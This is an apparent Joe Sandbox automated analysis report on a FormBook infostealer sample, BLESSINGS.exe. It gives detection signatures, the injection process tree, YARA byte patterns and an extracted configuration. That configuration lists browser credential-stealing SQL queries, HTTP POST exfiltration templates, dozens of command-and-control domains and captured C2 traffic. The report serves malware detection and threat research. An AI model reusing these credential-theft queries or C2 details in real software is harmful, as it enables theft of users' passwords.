Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report BLESSINGS.exe

Overview

General Information

Sample Name:BLESSINGS.exe
Analysis ID:339345
MD5:30cb872994e8a0a4a635b06bfbe38006
SHA1:02e502ef79ea251f04fa9e02dd1d7639e59c7ddc
SHA256:d0b62e121a89ba8e44b4b71a887dd80df1e4fc746dabc200854622e9ed1fa8cb
Tags:exe

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • BLESSINGS.exe (PID: 4588 cmdline: 'C:\Users\user\Desktop\BLESSINGS.exe' MD5: 30CB872994E8A0A4A635B06BFBE38006)
    • AddInProcess32.exe (PID: 6264 cmdline: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • raserver.exe (PID: 6744 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 2AADF65E395BFBD0D9B71D7279C8B5EC)
          • cmd.exe (PID: 6784 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x8bc2", "KEY1_OFFSET 0x1d510", "CONFIG SIZE : 0xf7", "CONFIG OFFSET 0x1d615", "URL SIZE : 33", "searching string pattern", "strings_offset 0x1c1a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x1004744a", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70d3", "0x9f715026", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012172", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014c1", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "strahlenschutz.digital", "soterppe.com", "wlw-hnlt.com", "topheadlinetowitness-today.info", "droriginals.com", "baculatechie.online", "definity.finance", "weddingmustgoon.com", "ludisenofloral.com", "kenniscourtureconsignments.com", "dl888.net", "singledynamics.com", "internetmarkaching.com", "solidconstruct.site", "ip-freight.com", "11sxsx.com", "incomecontent.com", "the343radio.com", "kimberlygoedhart.net", "dgdoughnuts.net", "vivethk.com", "st-reet.com", "luxusgrotte.com", "hareland.info", "fitdramas.com", "shakahats.com", "cositasdepachecos.com", "lhc965.com", "5hnjy.com", "zoommedicaremeetings.com", "bebywye.site", "ravenlewis.com", "avia-sales.xyz", "screwtaped.com", "xaustock.com", "hongreng.xyz", "lokalised.com", "neosolutionsllc.com", "ecandkllc.com", "sistertravelalliance.com", "brotherhoodoffathers.com", "mybestme.store", "vigilantdis.com", "sqatzx.com", "kornteengoods.com", "miamiwaterworld.com", "mywillandmylife.com", "novergi.com", "eaglesnestpropheticministry.com", "sterlworldshop.com", "gabriellagullberg.com", "toweroflifeinc.com", "tiendazoom.com", "dividupe.com", "szyulics.com", "theorangepearl.com", "hotvidzhub.download", "asacal.com", "systemedalarmebe.com", "margosbest.com", "kathymusic.com", "quintred.com", "mad54.art", "simplification.business", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.registeredagentfirm.com/jqc/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      8.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        8.2.AddInProcess32.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        8.2.AddInProcess32.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17609:$sqlite3step: 68 34 1C 7B E1
        • 0x1771c:$sqlite3step: 68 34 1C 7B E1
        • 0x17638:$sqlite3text: 68 38 2A 90 C5
        • 0x1775d:$sqlite3text: 68 38 2A 90 C5
        • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
        8.2.AddInProcess32.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          8.2.AddInProcess32.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 8.2.AddInProcess32.exe.400000.0.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x8bc2", "KEY1_OFFSET 0x1d510", "CONFIG SIZE : 0xf7", "CONFIG OFFSET 0x1d615", "URL SIZE : 33", "searching string pattern", "strings_offset 0x1c1a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x1004744a", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70d3", "0x9f715026", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012172", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014c1", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",
          Multi AV Scanner detection for submitted fileShow sources
          Source: BLESSINGS.exeVirustotal: Detection: 45%Perma Link
          Source: BLESSINGS.exeReversingLabs: Detection: 15%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: BLESSINGS.exeJoe Sandbox ML: detected
          Source: 8.2.AddInProcess32.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: BLESSINGS.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: BLESSINGS.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe, raserver.exe, 0000000F.00000002.688878285.0000000004A2F000.00000004.00000001.sdmp, AddInProcess32.exe.1.dr
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000A.00000000.460948394.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, raserver.exe, 0000000F.00000002.687497204.000000000461F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: AddInProcess32.exe, raserver.exe
          Source: Binary string: RAServer.pdb source: AddInProcess32.exe, 00000008.00000002.475617177.0000000001290000.00000040.00000001.sdmp
          Source: Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000008.00000002.474933726.0000000000B62000.00000002.00020000.sdmp, raserver.exe, 0000000F.00000002.688878285.0000000004A2F000.00000004.00000001.sdmp, AddInProcess32.exe.1.dr
          Source: Binary string: RAServer.pdbGCTL source: AddInProcess32.exe, 00000008.00000002.475617177.0000000001290000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000A.00000000.460948394.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 4x nop then jmp 0117F696h
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop edi
          Source: global trafficHTTP traffic detected: GET /jqc/?CZ=GWrWoWa4zZjFn82G+0nNh4GvWCUBG1oNYElUd01Cxs8I6tEnxSPY6FoFnAuUsLE3P+RrU5FSoA==&sv28R0=gnKTZf8P HTTP/1.1Host: www.quintred.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 91.195.241.137 91.195.241.137
          Source: Joe Sandbox ViewASN Name: SEDO-ASDE SEDO-ASDE
          Source: global trafficHTTP traffic detected: GET /jqc/?CZ=GWrWoWa4zZjFn82G+0nNh4GvWCUBG1oNYElUd01Cxs8I6tEnxSPY6FoFnAuUsLE3P+RrU5FSoA==&sv28R0=gnKTZf8P HTTP/1.1Host: www.quintred.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.toweroflifeinc.com
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: BLESSINGS.exe, 00000001.00000003.420634051.00000000014F8000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.c/g
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.11sxsx.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.11sxsx.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.11sxsx.com/jqc/www.sterlworldshop.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.11sxsx.comReferer:
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.asacal.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.asacal.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.asacal.com/jqc/:
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.asacal.comReferer:
          Source: explorer.exe, 0000000A.00000002.686806535.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.cositasdepachecos.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.cositasdepachecos.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.cositasdepachecos.com/jqc/www.margosbest.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.cositasdepachecos.comReferer:
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.droriginals.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.droriginals.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.droriginals.com/jqc/www.kornteengoods.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.droriginals.comReferer:
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.gabriellagullberg.com
